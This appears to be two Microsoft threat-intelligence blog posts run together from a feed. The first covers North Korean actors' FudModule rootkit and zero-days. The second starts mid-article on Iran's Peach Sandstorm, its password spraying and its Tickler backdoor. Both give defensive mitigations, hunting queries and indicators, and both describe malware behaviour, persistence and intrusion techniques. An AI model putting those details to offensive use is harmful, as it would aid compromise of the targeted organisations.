Diamond Sleet has been observed using FudModule since October 2021. The earliest variant of FudModule was reported publicly in September 2022 by ESET and AhnLAB researchers, when threat actors exploited known vulnerable drivers to establish admin-to-kernel access in the technique known as bring your own vulnerable driver (BYOVD). In February 2024, Avast researchers published analysis on an updated FudModule variant that is significantly more advanced and difficult to detect, since it exploits a zero-day vulnerability in appid.sys, an AppLocker driver that is installed by default into Windows (CVE-2024-21338).

Further research by Avast uncovered a full attack chain deploying the updated variant of FudModule known as “FudModule 2.0,” which includes malicious loaders and a late-stage remote access trojan (RAT). This attack chain revealed the previously unknown malware Kaolin RAT was responsible for loading the FudModule rootkit to targeted devices. Kaolin RAT established a secure, AES-encrypted connection with the command and control (C2) server and had capabilities to execute a robust list of commands, such as downloading and uploading files to the C2 server and creating or updating processes. The updated variant of FudModule exhibited an attack chain similar to that seen in Citrine Sleet’s zero-day exploit of CVE-2024-7971.

On August 13, Microsoft released a security update to address a zero-day vulnerability in the AFD.sys driver in Windows (CVE-2024-38193) identified by Gen Threat Labs. In early June, Gen Threat Labs identified Diamond Sleet exploiting this vulnerability in an attack employing the FudModule rootkit, which establishes full standard user-to-kernel access, advancing from the previously seen admin-to-kernel access. Gen Threat Labs released this information publicly on August 16.

Recommendations

The CVE-2024-7971 exploit chain relies on multiple components to compromise a target, and this attack chain fails if any of these components are blocked, including CVE-2024-38106. Microsoft released a security update on August 13, 2024, for the CVE-2024-38106 vulnerability exploited by Diamond Sleet, thus also blocking attempts to exploit the CVE-2024-7971 exploit chain on updated systems. Customers who have not implemented these fixes yet are urged to do so as soon as possible for their organization’s security.

Zero-day exploits necessitate not only keeping systems up to date, but also security solutions that provide unified visibility across the cyberattack chain to detect and block post-compromise attacker tools and malicious activity following exploitation. Microsoft recommends the following mitigations to reduce the impact of this threat.

Strengthen operating environment configuration

• Keep operating systems and applications up to date. Apply security patches as soon as possible. Ensure that Google Chrome web browser is updated at version 128.0.6613.84 or later, and Microsoft Edge web browser is updated at version 128.0.2739.42 or later to address the CVE-2024-7971 vulnerability.
• Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.

Strengthen Microsoft Defender for Endpoint configuration

• Ensure that tamper protection is turned on in Microsoft Dender for Endpoint.
• Enable network protection in Microsoft Defender for Endpoint.
• Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can help block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach.
• Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to help resolve breaches, significantly reducing alert volume.

Strengthen Microsoft Defender Antivirus configuration

• Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to help cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block majority of new and unknown variants.
• Turn on Microsoft Defender Antivirus scanning of downloaded files and attachments.
• Turn on real-time protection in Microsoft Defender Antivirus.

Detection details

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alert might also indicate threat activity related to this threat. Note, however, that this alert can also be triggered by unrelated threat activity.

• Emerging threat activity group Citrine Sleet detected

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

• CVE-2024-7971
• CVE-2024-38106

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence and protection information, and recommend actions to help prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

• Actor profile: Citrine Sleet
• Actor profile: Diamond Sleet
• Tool profile: AppleJeus

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Citrine Sleet domain activity

Microsoft Defender XDR customers may query for devices that may have interacted with Citrine Sleet domains related to this activity. Note that Microsoft Defender for Endpoint customers may surface related events with the alert title “Emerging threat activity group Citrine Sleet detected”.

let domainList = dynamic(["weinsteinfrog.com", "voyagorclub.space"]);
union
(
    DnsEvents
    | where QueryType has_any(domainList) or Name has_any(domainList)
    | project TimeGenerated, Domain = QueryType, SourceTable = "DnsEvents"
),
(
    IdentityQueryEvents
    | where QueryTarget has_any(domainList)
    | project Timestamp, Domain = QueryTarget, SourceTable = "IdentityQueryEvents"
),
(
    DeviceNetworkEvents
    | where RemoteUrl has_any(domainList)
    | project Timestamp, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents"
),
(
    DeviceNetworkInfo
    | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)
    | mv-expand DnsAddresses, ConnectedNetworks
    | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)
    | project Timestamp, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo"
),
(
    VMConnection
    | extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames)
    | mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames
    | where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList)
    | project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = "VMConnection"
),
(
    W3CIISLog
    | where csHost has_any(domainList) or csReferer has_any(domainList)
    | project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog"
),
(
    EmailUrlInfo
    | where UrlDomain has_any(domainList)
    | project Timestamp, Domain = UrlDomain, SourceTable = "EmailUrlInfo"
),
(
    UrlClickEvents
    | where Url has_any(domainList)
    | project Timestamp, Domain = Url, SourceTable = "UrlClickEvents"
)
| order by TimeGenerated desc

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Search for domain IOCs

let domainList = dynamic(["weinsteinfrog.com", "voyagorclub.space"]); 
union 
( 
DnsEvents 
| where QueryType has_any(domainList) or Name has_any(domainList) 
| project TimeGenerated, Domain = QueryType, SourceTable = "DnsEvents" 
), 
( 
IdentityQueryEvents 
| where QueryTarget has_any(domainList) 
| project TimeGenerated, Domain = QueryTarget, SourceTable = "IdentityQueryEvents" 
), 
( 
DeviceNetworkEvents 
| where RemoteUrl has_any(domainList) 
| project TimeGenerated, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents" 
), 
( 
DeviceNetworkInfo 
| extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks) 
| mv-expand DnsAddresses, ConnectedNetworks 
| where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList) 
| project TimeGenerated, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo" 
), 
( 
VMConnection 
| extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames) 
| mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames 
| where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList) 
| project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = "VMConnection" 
), 
( 
W3CIISLog 
| where csHost has_any(domainList) or csReferer has_any(domainList) 
| project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog" 
), 
( 
EmailUrlInfo 
| where UrlDomain has_any(domainList) 
| project TimeGenerated, Domain = UrlDomain, SourceTable = "EmailUrlInfo" 
), 
( 
UrlClickEvents 
| where Url has_any(domainList) 
| project TimeGenerated, Domain = Url, SourceTable = "UrlClickEvents" 
),
(
CommonSecurityLog
| where DestinationDnsDomain has_any(domainList)
| project TimeGenerated, Domain = DestinationDnsDomain, SourceTable = "CommonSecurityLog" 
),
(
EmailEvents
| where SenderFromDomain has_any (domainList) or SenderMailFromDomain has_any (domainList)
| project TimeGenerated, SenderfromDomain = SenderFromDomain,SenderMailfromDomain = SenderMailFromDomain, SourceTable = "EmailEvents"
)
| order by TimeGenerated desc

Assess presence of vulnerabilities used by Citrine Sleet

DeviceTvmSoftwareVulnerabilities  
| where CveId has_any ("CVE-2024-7971","CVE-2024-38106","CVE-2024-38193","CVE-2024-21338")
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel  
| join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId  
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware

Indicators of compromise

During the attacks, Microsoft observed the following IOCs:

• voyagorclub[.]space
• weinsteinfrog[.]com

References

• https://nvd.nist.gov/vuln/detail/CVE-2024-7971
• https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html
• https://nvd.nist.gov/vuln/detail/CVE-2024-4947
• https://nvd.nist.gov/vuln/detail/CVE-2024-5274
• https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/
• https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf
• https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf
• https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/
• https://www.gendigital.com/blog/news/innovation/protecting-windows-users
• https://www.google.com/chrome/update/
• https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html

Learn more

Read our blogs on threat actors, including Sleet actors. For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post North Korean threat actor Citrine Sleet exploiting Chromium zero-day appeared first on Microsoft Security Blog.

Peach Sandstorm also continued conducting password spray attacks against the educational sector for infrastructure procurement and against the satellite, government, and defense sectors as primary targets for intelligence collection. In addition, Microsoft observed intelligence gathering and possible social engineering targeting organizations within the higher education, satellite, and defense sectors via the professional networking platform LinkedIn.

Microsoft assesses that Peach Sandstorm operates on behalf of the Iranian Islamic Revolutionary Guard Corps (IRGC) based on the group’s victimology and operational focus. Microsoft further assesses that Peach Sandstorm’s operations are designed to facilitate intelligence collection in support of Iranian state interests.

Microsoft tracks Peach Sandstorm campaigns and directly notifies customers who we observe have been targeted or compromised, providing them with the necessary information to help secure their environment. As part of our continuous monitoring, analysis, and reporting on the threat landscape, we are sharing our research on Peach Sandstorm’s use of Tickler to raise awareness of this threat actor’s evolving tradecraft and to educate organizations on how to harden their attack surfaces against this and similar activity. Microsoft published information on unrelated election interference linked to Iran in the most recent Microsoft Threat Analysis Center (MTAC) report.

Evolution of Peach Sandstorm tradecraft

In past campaigns, Peach Sandstorm has been observed to use password spray attacks to gain access to targets of interest with a high level of success. The threat actor has also conducted intelligence gathering via LinkedIn, researching organizations and individuals employed in the higher education, satellite, and defense sectors.

During the group’s latest operations, Microsoft observed new tactics, techniques, and procedures (TTPs) following initial access via password spray attacks or social engineering. Between April and July 2024, Peach Sandstorm deployed a new custom multi-stage backdoor, Tickler, and leveraged Azure infrastructure hosted in fraudulent, attacker-controlled Azure subscriptions for command-and-control (C2). Microsoft continuously monitors Azure, along with all Microsoft products and services, to ensure compliance with our terms of service. Microsoft has notified affected organizations and disrupted the fraudulent Azure infrastructure and accounts associated with this activity.

Intelligence gathering on LinkedIn

Going back to at least November 2021 and continuing through mid-2024, Microsoft observed Peach Sandstorm using multiple LinkedIn profiles masquerading as students, developers, and talent acquisition managers based in the US and Western Europe. Peach Sandstorm primarily used them to conduct intelligence gathering and possible social engineering against the higher education, satellite sectors, and related industries. The identified LinkedIn accounts were subsequently taken down. Information on LinkedIn’s policies and actions against inauthentic behavior on its platform is available here.

Password spray attacks as a common attack vector

Since at least February 2023, Microsoft has observed Peach Sandstorm carrying out password spray activity against thousands of organizations. In password spray attacks, threat actors attempt to authenticate to many different accounts using a single password or a list of commonly used passwords. In contrast to brute force attacks, which target a single account using many passwords, password spray attacks help adversaries maximize their chances for success and minimize the likelihood of automatic account lockouts.

Microsoft has observed that once Peach Sandstorm has verified a target account’s credentials using the password spray technique, the threat actor performed subsequent sign-ins to the compromised accounts from commercial VPN infrastructure.

In April and May 2024, Microsoft observed Peach Sandstorm conducting password spray attacks targeting organizations in the defense, space, education, and government sectors in the US and Australia. In particular, Peach Sandstorm continued to use the “go-http-client” user agent that they are known to leverage in password spray campaigns. While the password spray activity appeared consistently across sectors, Microsoft observed Peach Sandstorm exclusively leveraging compromised user accounts in the education sector to procure operational infrastructure. In these cases, the threat actor accessed existing Azure subscriptions or created one using the compromised account to host their infrastructure. The attacker-controlled Azure infrastructure then served as C2 or operational hops for Peach Sandstorm operations targeting the government, defense, and space sectors. Recent updates to security defaults in Azure, such as multi-factor authentication help ensure that Azure accounts are more resistant to account compromise techniques such as those used by Peach Sandstorm.

Tickler malware

Microsoft Threat Intelligence identified two samples of the Tickler malware, a custom multi-stage backdoor, that Peach Sandstorm deployed in compromised environments as recently as July 2024. The first sample was contained in an archive file named Network Security.zip alongside benign PDF files used as decoy documents. The archive file contained:

• YAHSAT NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20240421.pdf.exe – theTickler malware
• Yahsat Policy Guide- April 2024.pdf – a benign PDF
• YAHSAT NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20240421.pdf – a second benign PDF

YAHSAT NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20240421.pdf.exe is a 64-bit C/C++ based native PE file. The sample begins with a Process Environment Block (PEB) traversal to locate the in-memory address of file kernell32.dll.

Upon successful PEB traversal yielding the address of kernell32.dll in memory, the sample decrypts a string to LoadLibraryA and resolves its address, decrypts the string “kernel32.dll”, and loads it again using LoadLibraryA. The sample then launches the benign PDF file YAHSAT NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20240421.pdf as a decoy document.

The sample collects the network information from the host and sends it to the C2 URI via HTTP POST request, likely as a means for the threat actor to orient themselves on the compromised network. The below network information is an example generated in a lab environment:

We subsequently observed Peach Sandstorm iterating and improving on this initial sample. The second Tickler sample, sold.dll, is a Trojan dropper functionally identical to the previously identified sample. The malware downloads additional payloads from the C2 server, including a backdoor, a batch script to set persistence for this backdoor, and the following legitimate files:

• msvcp140.dll (SHA-256: dad53a78662707d182cdb230e999ef6effc0b259def31c196c51cc3e8c42a9b8)
• LoggingPlatform.dll (SHA-256: 56ac00856b19b41bc388ecf749eb4651369e7ced0529e9bf422284070de457b6)
• vcruntime140.dll (SHA-256: 22017c9b022e6f2560fee7d544a83ea9e3d85abee367f2f20b3b0448691fe2d4)
• Microsoft.SharePoint.NativeMessaging.exe (SHA-256: e984d9085ae1b1b0849199d883d05efbccc92242b1546aeca8afd4b1868c54f5)

The files msvcp140.dll, LoggingPlatform.dll, vcruntime140.dll, and Microsoft.SharePoint.NativeMessaging.exe are legitimate Windows signed binaries likely used for DLL sideloading.

Additionally, we observed the sample downloading the following malicious files:

• A batch script (SHA-256: 5df4269998ed79fbc997766303759768ce89ff1412550b35ff32e85db3c1f57b)
• A DLL file (SHA-256: fb70ff49411ce04951895977acfc06fa468e4aa504676dedeb40ba5cea76f37f)
• A DLL file (SHA-256: 711d3deccc22f5acfd3a41b8c8defb111db0f2b474febdc7f20a468f67db0350)

The batch script adds a registry Run key for a file called SharePoint.exe, likely used to load the malicious DLL files above, thus setting up persistence:

The two DLL files are both 64-bit C/C++ compiled PE DLL files and appear to be functionally identical to the previously analyzed samples. As fully functional backdoors, they can run the following commands:

• systeminfo – Gather system information
• dir – List directory
• run – Execute command
• delete – Delete file
• interval – Sleep interval
• upload – Download file from the C2
• download – Upload file to the C2

Azure resources abuse

Microsoft observed Peach Sandstorm creating Azure tenants using Microsoft Outlook email accounts and creating Azure for Students subscriptions in these tenants. Additionally, the group leveraged compromised user accounts in the Azure tenants of organizations in the education sector to do the same. Within these subscriptions, Peach Sandstorm subsequently created Azure resources for use as C2 for the backdoor. Of note, we have observed multiple Iranian groups, including Smoke Sandstorm, use similar techniques in recent months. The following resources were created by Peach Sandstorm for use as Tickler C2 nodes:

• subreviews.azurewebsites[.]net 
• satellite2.azurewebsites[.]net 
• nodetestservers.azurewebsites[.]net 
• satellitegardens.azurewebsites[.]net 
• softwareservicesupport.azurewebsites[.]net
• getservicessuports.azurewebsites[.]net
• getservicessupports.azurewebsites[.]net 
• getsupportsservices.azurewebsites[.]net 
• satellitespecialists.azurewebsites[.]net
• satservicesdev.azurewebsites[.]net
• servicessupports.azurewebsites[.]net
• websupportprotection.azurewebsites[.]net 
• supportsoftwarecenter.azurewebsites[.]net
• centersoftwaresupports.azurewebsites[.]net
• softwareservicesupports.azurewebsites[.]net
• getsdervicessupoortss.azurewebsites[.]net

Post-compromise activity

In the past year, Peach Sandstorm has successfully compromised several organizations, primarily in the aforementioned sectors, using bespoke tooling. Once Peach Sandstorm gains access to an organization, the threat actor is known to perform lateral movement and actions on objectives using the following techniques:

Moving laterally via Server Message Block (SMB)

After compromising a European defense organization, Peach Sandstorm threat actors moved laterally via SMB. SMB lateral movement is a technique used by threat actors to move from one compromised machine to another within a network by exploiting the SMB protocol. This protocol, which is used for sharing files, printers, and other resources on a network, could be misused by attackers to propagate their access and gain control over multiple systems.

Downloading and installing a remote monitoring and management (RMM) tool

In an older intrusion against a multinational pharmaceutical company not associated with the campaign discussed in this blog, after a likely successful password spray attack, Peach Sandstorm attempted to download and install AnyDesk, a commercial RMM tool. AnyDesk has a range of capabilities that allow users to remotely access a network, persist in a compromised environment, and enable command and control. The convenience and utility of a tool like AnyDesk is amplified by the fact that it might be permitted by application controls in environments where it is used legitimately by IT support personnel or system administrators.

Taking an Active Directory (AD) snapshot

In at least one intrusion against a Middle East-based satellite operator, Peach Sandstorm actors compromised a user using a malicious ZIP file delivered via Microsoft Teams message followed by dropping AD Explorer and taking an AD snapshot. An AD snapshot is a read-only, point-in-time copy of the AD database and related files, which can be used for various legitimate administrative tasks. These snapshots can also be exploited by threat actors for malicious purposes.

Mitigations

To harden networks against Peach Sandstorm activity, defenders can implement the following:

• Reset account passwords for any accounts targeted during a password spray attack. If a targeted account had system-level permissions, further investigation may be warranted. 
• Revoke session cookies in addition to resetting passwords. 
  • Revoke any MFA setting changes made by the attacker on any compromised users’ accounts. 
  • Require re-challenging MFA for MFA updates as the default. 
• Implement the Azure Security Benchmark and general best practices for securing identity infrastructure, including:  
  • Create conditional access policies to allow or disallow access to the environment based on defined criteria. 
  • Block legacy authentication with Microsoft Entra by using Conditional Access. Legacy authentication protocols don’t have the ability to enforce multifactor authentication (MFA), so blocking such authentication methods will help prevent password spray attackers from taking advantage of the lack of MFA on those protocols. 
  • Enable AD FS web application proxy extranet lockout to protect users from potential password brute force compromise. 
• Secure accounts with credential hygiene: 
  • Practice the principle of least privilege and audit privileged account activity in your Microsoft Entra environments to help slow and stop attackers.  
  • Deploy Microsoft Entra Connect Health for Active Directory Federation Services (AD FS). This captures failed attempts as well as IP addresses recorded in AD FS logs for bad requests in the Risky IP report. 
  • Use Microsoft Entra password protection to help detect and block known weak passwords and their variants. 
  • Turn on identity protection in Microsoft Entra to monitor for identity-based risks and create policies for risky sign ins. 
• Comply with the recent MFA enforcement policy requiring all Azure accounts to utilize MFA. Keep MFA always-on for privileged accounts and apply risk-based MFA for normal accounts.
  • Consider transitioning to a passwordless primary authentication method, such as Azure MFA, certificates, or Windows Hello for Business. 
• Secure remote desktop protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.

To protect against password spray attacks, implement the following mitigations:

• Eliminate insecure passwords.
• Educate users to review sign-in activity and mark suspicious sign-in attempts as “This wasn’t me”.
• Reset account passwords for any accounts targeted during a password spray attack. If a targeted account had system-level permissions, further investigation may be warranted.
• Detect, investigate, and remediate identity-based attacks using solutions like Microsoft Entra ID Protection.
• Investigate compromised accounts using Microsoft Purview Audit (Premium).
• Enforce on-premises Microsoft Entra Password Protection for Microsoft Active Directory Domain Services.
• Use risk detections for user sign-ins to trigger multifactor authentication or password changes.
• Investigate any possible password spray activity using the password spray investigation playbook.

Strengthen endpoints against attacks by following these steps:

• Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to help cover rapidly evolving attacker tools and techniques. 
• Enable real-time protection in Microsoft Defender Antivirus or the equivalent for your antivirus product. 
• Detect and block potentially unwanted applications through Microsoft Defender for Endpoint. 
• Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can help block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat, or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-compromise. 
• Turn on attack surface reduction rules to help prevent common attack techniques:  
  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion  
  • Block execution of potentially obfuscated scripts 
• Implement anomaly detection policies in Microsoft Defender for Cloud Apps. 
• Enable protections in Microsoft Defender for Endpoint to help safeguard against malicious sites and internet-based threats. 
  • Network protection 
  • Web protection 
• Enable tamper protection within Microsoft Defender for Endpoint to help prevent threat actors from disabling or changing security features, such as virus and threat protection.

Microsoft Defender XDR detections

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects components of this threat as the following malware:

• TrojanDownloader:Win64/Tickler
• Backdoor:Win64/Tickler

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

• Peach Sandstorm actor activity detected

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

• Password spraying
• Unfamiliar Sign-in properties
• An executable file loaded an unexpected DLL file

Microsoft Defender for Identity

The following Microsoft Defender for Identity alerts can indicate activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

• Atypical travel
• Suspicious behavior: Impossible travel activity

Microsoft Defender for Cloud Apps

The following Microsoft Defender for Cloud Apps alerts can indicate activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

• Activity from a Tor IP address
• Suspicious Administrative Activity
• Impossible travel activity
• Multiple failed login attempts
• Activity from an anonymous proxy

Threat intelligence reports

Microsoft Defender Threat Intelligence customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to help prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

• Abuse of remote monitoring and management tools
• DLL sideloading and DLL search order hijacking

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Failed logon activity

The following query identifies failed attempts to sign-in from multiple sources that originate from a single ISP. Attackers distribute attacks from multiple IP addresses across a single service provider to evade detection. Run query 

IdentityLogonEvents
| where Timestamp > ago(4h)
| where ActionType == "LogonFailed"
| where isnotempty(AccountObjectId)
| summarize TargetCount = dcount(AccountObjectId), TargetCountry = dcount(Location), TargetIPAddress = dcount(IPAddress) by ISP
| where TargetCount >= 100
| where TargetCountry >= 5
| where TargetIPAddress >= 25

Connectivity to C2s

The following queries identifies connectivity to Peach Sandstorm created Azure App Service apps for command and control. Run query

let domainList = dynamic(["subreviews.azurewebsites.net", 
    "satellite2.azurewebsites.net",
    "nodetestservers.azurewebsites.net", 
    "satellitegardens.azurewebsites.net",
    "softwareservicesupport.azurewebsites.net",
    "getservicessuports.azurewebsites.net",
    "getservicessupports.azurewebsites.net",
    "getsupportsservices.azurewebsites.net",
    "satellitespecialists.azurewebsites.net",
    "satservicesdev.azurewebsites.net",
    "servicessupports.azurewebsites.net",
    "websupportprotection.azurewebsites.net ",
    "supportsoftwarecenter.azurewebsites.net",
    "centersoftwaresupports.azurewebsites.net"
    "softwareservicesupports.azurewebsites.net",
    "getsdervicessupoortss.azurewebsites.net"]);union
(
    DnsEvents
    | where QueryType has_any(domainList) or Name has_any(domainList)
    | project TimeGenerated, Domain = QueryType, SourceTable = "DnsEvents"
),
(
    IdentityQueryEvents
    | where QueryTarget has_any(domainList)
    | project Timestamp, Domain = QueryTarget, SourceTable = "IdentityQueryEvents"
),
(
    DeviceNetworkEvents
    | where RemoteUrl has_any(domainList)
    | project Timestamp, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents"
),
(
    DeviceNetworkInfo
    | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)
    | mv-expand DnsAddresses, ConnectedNetworks
    | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)
    | project Timestamp, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo"
),
(
    VMConnection
    | extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames)
    | mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames
    | where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList)
    | project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = "VMConnection"
),
(
    W3CIISLog
    | where csHost has_any(domainList) or csReferer has_any(domainList)
    | project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog"
),
(
    EmailUrlInfo
    | where UrlDomain has_any(domainList)
    | project Timestamp, Domain = UrlDomain, SourceTable = "EmailUrlInfo"
),
(
    UrlClickEvents
    | where Url has_any(domainList)
    | project Timestamp, Domain = Url, SourceTable = "UrlClickEvents"
)
| order by TimeGenerated desc

Malicious file activity

The following query will surface events involving malicious files related to this activity. Run query

let fileHashes = dynamic(["711d3deccc22f5acfd3a41b8c8defb111db0f2b474febdc7f20a468f67db0350", "fb70ff49411ce04951895977acfc06fa468e4aa504676dedeb40ba5cea76f37f", "5df4269998ed79fbc997766303759768ce89ff1412550b35ff32e85db3c1f57b", "ccb617cc7418a3b22179e00d21db26754666979b4c4f34c7fda8c0082d08cec4", "7eb2e9e8cd450fc353323fd2e8b84fbbdfe061a8441fd71750250752c577d198"]);
union
(
    DeviceFileEvents
    | where SHA256 in (fileHashes)
    | project Timestamp, FileHash = SHA256, SourceTable = "DeviceFileEvents"
),
(
    DeviceEvents
    | where SHA256 in (fileHashes)
    | project Timestamp, FileHash = SHA256, SourceTable = "DeviceEvents"
),
(
    DeviceImageLoadEvents
    | where SHA256 in (fileHashes)
    | project Timestamp, FileHash = SHA256, SourceTable = "DeviceImageLoadEvents"
),
(
    DeviceProcessEvents
    | where SHA256 in (fileHashes)
    | project Timestamp, FileHash = SHA256, SourceTable = "DeviceProcessEvents"
)
| order by Timestamp desc

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

• Signin Password Spray
• New Location Azure AD Sign Ins
• Enumeration of users & groups for lateral movement
• SMB shares Discovery
• Anomaly in SMB Traffic
• AnyDesk Net Connection
• AnyDesk – File Signature
• AnyDesk – Create Process
• DCSync Attack Detection

Indicators of compromise

Domains

• subreviews.azurewebsites[.]net 
• satellite2.azurewebsites[.]net 
• nodetestservers.azurewebsites[.]net 
• satellitegardens.azurewebsites[.]net 
• softwareservicesupport.azurewebsites[.]net
• getservicessuports.azurewebsites[.]net
• getservicessupports.azurewebsites[.]net 
• getsupportsservices.azurewebsites[.]net 
• satellitespecialists.azurewebsites[.]net
• satservicesdev.azurewebsites[.]net
• servicessupports.azurewebsites[.]net
• websupportprotection.azurewebsites[.]net 
• supportsoftwarecenter.azurewebsites[.]net
• centersoftwaresupports.azurewebsites[.]net
• softwareservicesupports.azurewebsites[.]net
• getsdervicessupoortss.azurewebsites[.]net

Tickler samples and related indicators

• YAHSAT NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20240421.pdf.exe (SHA-256:  7eb2e9e8cd450fc353323fd2e8b84fbbdfe061a8441fd71750250752c577d198)
• Sold.dll (SHA-256: ccb617cc7418a3b22179e00d21db26754666979b4c4f34c7fda8c0082d08cec4)
• Batch script (SHA-256: 5df4269998ed79fbc997766303759768ce89ff1412550b35ff32e85db3c1f57b)
• Malicious DLL (SHA-256: fb70ff49411ce04951895977acfc06fa468e4aa504676dedeb40ba5cea76f37f)
• Malicious DLL (SHA-256: 711d3deccc22f5acfd3a41b8c8defb111db0f2b474febdc7f20a468f67db0350)

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

